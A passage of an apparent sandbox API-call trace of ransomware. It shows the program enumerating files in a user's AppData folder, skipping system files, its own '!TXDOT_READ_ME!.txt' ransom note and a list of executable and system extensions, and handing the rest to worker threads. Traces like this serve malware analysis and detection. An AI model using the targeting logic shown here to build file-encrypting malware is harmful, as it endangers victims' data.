StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.261] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\AppData\\Roaming\\DRvrEGQ_bV7.png", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\DRvrEGQ_bV7.png") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\DRvrEGQ_bV7.png" [0072.261] SetEvent (hEvent=0x408) returned 1 [0072.261] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60d3f580, ftCreationTime.dwHighDateTime=0x1d5ee6c, ftLastAccessTime.dwLowDateTime=0xa2661670, ftLastAccessTime.dwHighDateTime=0x1d5e400, ftLastWriteTime.dwLowDateTime=0xa2661670, ftLastWriteTime.dwHighDateTime=0x1d5e400, nFileSizeHigh=0x0, nFileSizeLow=0x1428f, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="DVmE9qFtb1fE2H.bmp", cAlternateFileName="DVME9Q~1.BMP")) returned 1 [0072.261] StrCmpW (psz1="DVmE9qFtb1fE2H.bmp", psz2=".") returned 1 [0072.261] StrCmpW (psz1="DVmE9qFtb1fE2H.bmp", psz2="..") returned 1 [0072.261] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.261] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0072.261] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="DVmE9qFtb1fE2H.bmp", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\DVmE9qFtb1fE2H.bmp") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\DVmE9qFtb1fE2H.bmp" [0072.261] PathFindExtensionW (pszPath="DVmE9qFtb1fE2H.bmp") returned=".bmp" [0072.261] StrCmpW (psz1=".bmp", psz2=".txd0t") returned -1 [0072.261] StrCmpIW (psz1="DVmE9qFtb1fE2H.bmp", psz2="bootsect.bak") returned 1 [0072.261] StrCmpIW (psz1="DVmE9qFtb1fE2H.bmp", psz2="iconcache.db") returned -1 [0072.261] StrCmpIW (psz1="DVmE9qFtb1fE2H.bmp", psz2="thumbs.db") returned -1 [0072.261] StrCmpIW (psz1="DVmE9qFtb1fE2H.bmp", psz2=" ransomware ") returned 1 [0072.261] StrCmpIW (psz1="DVmE9qFtb1fE2H.bmp", psz2=" ransom ") returned 1 [0072.262] StrCmpIW (psz1="DVmE9qFtb1fE2H.bmp", psz2="debug.txt") returned 1 [0072.262] StrCmpIW (psz1="DVmE9qFtb1fE2H.bmp", psz2="boot.ini") returned 1 [0072.262] StrCmpIW (psz1="DVmE9qFtb1fE2H.bmp", psz2="desktop.ini") returned 1 [0072.262] StrCmpIW (psz1="DVmE9qFtb1fE2H.bmp", psz2="autorun.inf") returned 1 [0072.262] StrCmpIW (psz1="DVmE9qFtb1fE2H.bmp", psz2="ntuser.dat") returned -1 [0072.262] StrCmpIW (psz1="DVmE9qFtb1fE2H.bmp", psz2="ntldr") returned -1 [0072.262] StrCmpIW (psz1="DVmE9qFtb1fE2H.bmp", psz2="ntdetect.com") returned -1 [0072.262] StrCmpIW (psz1="DVmE9qFtb1fE2H.bmp", psz2="bootfont.bin") returned 1 [0072.262] StrCmpIW (psz1="DVmE9qFtb1fE2H.bmp", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.262] PathFindExtensionW (pszPath="DVmE9qFtb1fE2H.bmp") returned=".bmp" [0072.262] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".bmp") returned 0x0 [0072.262] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0072.262] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0072.262] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0072.271] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.271] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\AppData\\Roaming\\DVmE9qFtb1fE2H.bmp", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\DVmE9qFtb1fE2H.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\DVmE9qFtb1fE2H.bmp" [0072.271] SetEvent (hEvent=0x3fc) returned 1 [0072.271] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x811d38e0, ftCreationTime.dwHighDateTime=0x1d5e77a, ftLastAccessTime.dwLowDateTime=0x6095b3a0, ftLastAccessTime.dwHighDateTime=0x1d5f093, ftLastWriteTime.dwLowDateTime=0x6095b3a0, ftLastWriteTime.dwHighDateTime=0x1d5f093, nFileSizeHigh=0x0, nFileSizeLow=0x15f61, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="ET9_8drX4.bmp", cAlternateFileName="ET9_8D~1.BMP")) returned 1 [0072.271] StrCmpW (psz1="ET9_8drX4.bmp", psz2=".") returned 1 [0072.271] StrCmpW (psz1="ET9_8drX4.bmp", psz2="..") returned 1 [0072.272] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.272] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0072.272] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="ET9_8drX4.bmp", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\ET9_8drX4.bmp") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\ET9_8drX4.bmp" [0072.272] PathFindExtensionW (pszPath="ET9_8drX4.bmp") returned=".bmp" [0072.272] StrCmpW (psz1=".bmp", psz2=".txd0t") returned -1 [0072.272] StrCmpIW (psz1="ET9_8drX4.bmp", psz2="bootsect.bak") returned 1 [0072.272] StrCmpIW (psz1="ET9_8drX4.bmp", psz2="iconcache.db") returned -1 [0072.272] StrCmpIW (psz1="ET9_8drX4.bmp", psz2="thumbs.db") returned -1 [0072.272] StrCmpIW (psz1="ET9_8drX4.bmp", psz2=" ransomware ") returned 1 [0072.272] StrCmpIW (psz1="ET9_8drX4.bmp", psz2=" ransom ") returned 1 [0072.272] StrCmpIW (psz1="ET9_8drX4.bmp", psz2="debug.txt") returned 1 [0072.272] StrCmpIW (psz1="ET9_8drX4.bmp", psz2="boot.ini") returned 1 [0072.272] StrCmpIW (psz1="ET9_8drX4.bmp", psz2="desktop.ini") returned 1 [0072.272] StrCmpIW (psz1="ET9_8drX4.bmp", psz2="autorun.inf") returned 1 [0072.272] StrCmpIW (psz1="ET9_8drX4.bmp", psz2="ntuser.dat") returned -1 [0072.272] StrCmpIW (psz1="ET9_8drX4.bmp", psz2="ntldr") returned -1 [0072.272] StrCmpIW (psz1="ET9_8drX4.bmp", psz2="ntdetect.com") returned -1 [0072.272] StrCmpIW (psz1="ET9_8drX4.bmp", psz2="bootfont.bin") returned 1 [0072.272] StrCmpIW (psz1="ET9_8drX4.bmp", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.272] PathFindExtensionW (pszPath="ET9_8drX4.bmp") returned=".bmp" [0072.272] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".bmp") returned 0x0 [0072.272] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0072.272] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0072.272] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0072.282] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.282] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\AppData\\Roaming\\ET9_8drX4.bmp", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\ET9_8drX4.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\ET9_8drX4.bmp" [0072.282] SetEvent (hEvent=0x418) returned 1 [0072.282] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8272fdf0, ftCreationTime.dwHighDateTime=0x1d5e492, ftLastAccessTime.dwLowDateTime=0x5b120f00, ftLastAccessTime.dwHighDateTime=0x1d5e7d8, ftLastWriteTime.dwLowDateTime=0x5b120f00, ftLastWriteTime.dwHighDateTime=0x1d5e7d8, nFileSizeHigh=0x0, nFileSizeLow=0xe132, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="f_xuR_I_FeQoISyA_I.avi", cAlternateFileName="F_XUR_~1.AVI")) returned 1 [0072.282] StrCmpW (psz1="f_xuR_I_FeQoISyA_I.avi", psz2=".") returned 1 [0072.282] StrCmpW (psz1="f_xuR_I_FeQoISyA_I.avi", psz2="..") returned 1 [0072.282] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.282] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0072.282] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="f_xuR_I_FeQoISyA_I.avi", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\f_xuR_I_FeQoISyA_I.avi") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\f_xuR_I_FeQoISyA_I.avi" [0072.282] PathFindExtensionW (pszPath="f_xuR_I_FeQoISyA_I.avi") returned=".avi" [0072.282] StrCmpW (psz1=".avi", psz2=".txd0t") returned -1 [0072.282] StrCmpIW (psz1="f_xuR_I_FeQoISyA_I.avi", psz2="bootsect.bak") returned 1 [0072.282] StrCmpIW (psz1="f_xuR_I_FeQoISyA_I.avi", psz2="iconcache.db") returned -1 [0072.282] StrCmpIW (psz1="f_xuR_I_FeQoISyA_I.avi", psz2="thumbs.db") returned -1 [0072.282] StrCmpIW (psz1="f_xuR_I_FeQoISyA_I.avi", psz2=" ransomware ") returned 1 [0072.282] StrCmpIW (psz1="f_xuR_I_FeQoISyA_I.avi", psz2=" ransom ") returned 1 [0072.282] StrCmpIW (psz1="f_xuR_I_FeQoISyA_I.avi", psz2="debug.txt") returned 1 [0072.282] StrCmpIW (psz1="f_xuR_I_FeQoISyA_I.avi", psz2="boot.ini") returned 1 [0072.282] StrCmpIW (psz1="f_xuR_I_FeQoISyA_I.avi", psz2="desktop.ini") returned 1 [0072.283] StrCmpIW (psz1="f_xuR_I_FeQoISyA_I.avi", psz2="autorun.inf") returned 1 [0072.283] StrCmpIW (psz1="f_xuR_I_FeQoISyA_I.avi", psz2="ntuser.dat") returned -1 [0072.283] StrCmpIW (psz1="f_xuR_I_FeQoISyA_I.avi", psz2="ntldr") returned -1 [0072.283] StrCmpIW (psz1="f_xuR_I_FeQoISyA_I.avi", psz2="ntdetect.com") returned -1 [0072.283] StrCmpIW (psz1="f_xuR_I_FeQoISyA_I.avi", psz2="bootfont.bin") returned 1 [0072.283] StrCmpIW (psz1="f_xuR_I_FeQoISyA_I.avi", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.283] PathFindExtensionW (pszPath="f_xuR_I_FeQoISyA_I.avi") returned=".avi" [0072.283] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".avi") returned 0x0 [0072.283] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0072.283] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0072.283] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0072.296] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.296] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\AppData\\Roaming\\f_xuR_I_FeQoISyA_I.avi", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\f_xuR_I_FeQoISyA_I.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\f_xuR_I_FeQoISyA_I.avi" [0072.296] SetEvent (hEvent=0x408) returned 1 [0072.296] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec6ceb60, ftCreationTime.dwHighDateTime=0x1d5e516, ftLastAccessTime.dwLowDateTime=0xab8a54e0, ftLastAccessTime.dwHighDateTime=0x1d5e7ee, ftLastWriteTime.dwLowDateTime=0xab8a54e0, ftLastWriteTime.dwHighDateTime=0x1d5e7ee, nFileSizeHigh=0x0, nFileSizeLow=0x17358, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="j9Q4P.avi", cAlternateFileName="")) returned 1 [0072.296] StrCmpW (psz1="j9Q4P.avi", psz2=".") returned 1 [0072.296] StrCmpW (psz1="j9Q4P.avi", psz2="..") returned 1 [0072.296] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.296] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0072.296] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="j9Q4P.avi", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\j9Q4P.avi") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\j9Q4P.avi" [0072.296] PathFindExtensionW (pszPath="j9Q4P.avi") returned=".avi" [0072.297] StrCmpW (psz1=".avi", psz2=".txd0t") returned -1 [0072.297] StrCmpIW (psz1="j9Q4P.avi", psz2="bootsect.bak") returned 1 [0072.297] StrCmpIW (psz1="j9Q4P.avi", psz2="iconcache.db") returned 1 [0072.297] StrCmpIW (psz1="j9Q4P.avi", psz2="thumbs.db") returned -1 [0072.297] StrCmpIW (psz1="j9Q4P.avi", psz2=" ransomware ") returned 1 [0072.297] StrCmpIW (psz1="j9Q4P.avi", psz2=" ransom ") returned 1 [0072.297] StrCmpIW (psz1="j9Q4P.avi", psz2="debug.txt") returned 1 [0072.297] StrCmpIW (psz1="j9Q4P.avi", psz2="boot.ini") returned 1 [0072.297] StrCmpIW (psz1="j9Q4P.avi", psz2="desktop.ini") returned 1 [0072.297] StrCmpIW (psz1="j9Q4P.avi", psz2="autorun.inf") returned 1 [0072.297] StrCmpIW (psz1="j9Q4P.avi", psz2="ntuser.dat") returned -1 [0072.297] StrCmpIW (psz1="j9Q4P.avi", psz2="ntldr") returned -1 [0072.297] StrCmpIW (psz1="j9Q4P.avi", psz2="ntdetect.com") returned -1 [0072.297] StrCmpIW (psz1="j9Q4P.avi", psz2="bootfont.bin") returned 1 [0072.297] StrCmpIW (psz1="j9Q4P.avi", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.297] PathFindExtensionW (pszPath="j9Q4P.avi") returned=".avi" [0072.297] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".avi") returned 0x0 [0072.297] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0072.297] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0072.297] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0072.297] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.297] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\AppData\\Roaming\\j9Q4P.avi", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\j9Q4P.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\j9Q4P.avi" [0072.297] SetEvent (hEvent=0x3fc) returned 1 [0072.297] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76d197f0, ftCreationTime.dwHighDateTime=0x1d5ee41, ftLastAccessTime.dwLowDateTime=0xc11de6a0, ftLastAccessTime.dwHighDateTime=0x1d5eaff, ftLastWriteTime.dwLowDateTime=0xc11de6a0, ftLastWriteTime.dwHighDateTime=0x1d5eaff, nFileSizeHigh=0x0, nFileSizeLow=0x3688, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="juYPe6EuKhsFCwN.mp3", cAlternateFileName="JUYPE6~1.MP3")) returned 1 [0072.297] StrCmpW (psz1="juYPe6EuKhsFCwN.mp3", psz2=".") returned 1 [0072.297] StrCmpW (psz1="juYPe6EuKhsFCwN.mp3", psz2="..") returned 1 [0072.297] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.297] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0072.297] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="juYPe6EuKhsFCwN.mp3", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\juYPe6EuKhsFCwN.mp3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\juYPe6EuKhsFCwN.mp3" [0072.297] PathFindExtensionW (pszPath="juYPe6EuKhsFCwN.mp3") returned=".mp3" [0072.297] StrCmpW (psz1=".mp3", psz2=".txd0t") returned -1 [0072.298] StrCmpIW (psz1="juYPe6EuKhsFCwN.mp3", psz2="bootsect.bak") returned 1 [0072.298] StrCmpIW (psz1="juYPe6EuKhsFCwN.mp3", psz2="iconcache.db") returned 1 [0072.298] StrCmpIW (psz1="juYPe6EuKhsFCwN.mp3", psz2="thumbs.db") returned -1 [0072.298] StrCmpIW (psz1="juYPe6EuKhsFCwN.mp3", psz2=" ransomware ") returned 1 [0072.298] StrCmpIW (psz1="juYPe6EuKhsFCwN.mp3", psz2=" ransom ") returned 1 [0072.298] StrCmpIW (psz1="juYPe6EuKhsFCwN.mp3", psz2="debug.txt") returned 1 [0072.298] StrCmpIW (psz1="juYPe6EuKhsFCwN.mp3", psz2="boot.ini") returned 1 [0072.298] StrCmpIW (psz1="juYPe6EuKhsFCwN.mp3", psz2="desktop.ini") returned 1 [0072.298] StrCmpIW (psz1="juYPe6EuKhsFCwN.mp3", psz2="autorun.inf") returned 1 [0072.298] StrCmpIW (psz1="juYPe6EuKhsFCwN.mp3", psz2="ntuser.dat") returned -1 [0072.298] StrCmpIW (psz1="juYPe6EuKhsFCwN.mp3", psz2="ntldr") returned -1 [0072.298] StrCmpIW (psz1="juYPe6EuKhsFCwN.mp3", psz2="ntdetect.com") returned -1 [0072.298] StrCmpIW (psz1="juYPe6EuKhsFCwN.mp3", psz2="bootfont.bin") returned 1 [0072.298] StrCmpIW (psz1="juYPe6EuKhsFCwN.mp3", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.298] PathFindExtensionW (pszPath="juYPe6EuKhsFCwN.mp3") returned=".mp3" [0072.298] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".mp3") returned 0x0 [0072.298] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0072.298] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0072.298] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0072.310] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.310] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\AppData\\Roaming\\juYPe6EuKhsFCwN.mp3", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\juYPe6EuKhsFCwN.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\juYPe6EuKhsFCwN.mp3" [0072.310] SetEvent (hEvent=0x418) returned 1 [0072.310] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe92c23c0, ftCreationTime.dwHighDateTime=0x1d5eab2, ftLastAccessTime.dwLowDateTime=0xd095ca70, ftLastAccessTime.dwHighDateTime=0x1d5ee11, ftLastWriteTime.dwLowDateTime=0xd095ca70, ftLastWriteTime.dwHighDateTime=0x1d5ee11, nFileSizeHigh=0x0, nFileSizeLow=0x2f86, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="jZeT4BL.m4a", cAlternateFileName="")) returned 1 [0072.310] StrCmpW (psz1="jZeT4BL.m4a", psz2=".") returned 1 [0072.310] StrCmpW (psz1="jZeT4BL.m4a", psz2="..") returned 1 [0072.310] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.310] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0072.311] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="jZeT4BL.m4a", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\jZeT4BL.m4a") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\jZeT4BL.m4a" [0072.311] PathFindExtensionW (pszPath="jZeT4BL.m4a") returned=".m4a" [0072.311] StrCmpW (psz1=".m4a", psz2=".txd0t") returned -1 [0072.311] StrCmpIW (psz1="jZeT4BL.m4a", psz2="bootsect.bak") returned 1 [0072.311] StrCmpIW (psz1="jZeT4BL.m4a", psz2="iconcache.db") returned 1 [0072.311] StrCmpIW (psz1="jZeT4BL.m4a", psz2="thumbs.db") returned -1 [0072.311] StrCmpIW (psz1="jZeT4BL.m4a", psz2=" ransomware ") returned 1 [0072.312] StrCmpIW (psz1="jZeT4BL.m4a", psz2=" ransom ") returned 1 [0072.312] StrCmpIW (psz1="jZeT4BL.m4a", psz2="debug.txt") returned 1 [0072.312] StrCmpIW (psz1="jZeT4BL.m4a", psz2="boot.ini") returned 1 [0072.312] StrCmpIW (psz1="jZeT4BL.m4a", psz2="desktop.ini") returned 1 [0072.312] StrCmpIW (psz1="jZeT4BL.m4a", psz2="autorun.inf") returned 1 [0072.312] StrCmpIW (psz1="jZeT4BL.m4a", psz2="ntuser.dat") returned -1 [0072.312] StrCmpIW (psz1="jZeT4BL.m4a", psz2="ntldr") returned -1 [0072.312] StrCmpIW (psz1="jZeT4BL.m4a", psz2="ntdetect.com") returned -1 [0072.312] StrCmpIW (psz1="jZeT4BL.m4a", psz2="bootfont.bin") returned 1 [0072.312] StrCmpIW (psz1="jZeT4BL.m4a", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.312] PathFindExtensionW (pszPath="jZeT4BL.m4a") returned=".m4a" [0072.312] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".m4a") returned 0x0 [0072.312] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0072.312] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0072.312] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0072.319] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.319] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\AppData\\Roaming\\jZeT4BL.m4a", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\jZeT4BL.m4a") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\jZeT4BL.m4a" [0072.320] SetEvent (hEvent=0x408) returned 1 [0072.320] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53cdcf0, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xd35c70fc, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe53cf090, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Macromedia", cAlternateFileName="MACROM~1")) returned 1 [0072.320] StrCmpW (psz1="Macromedia", 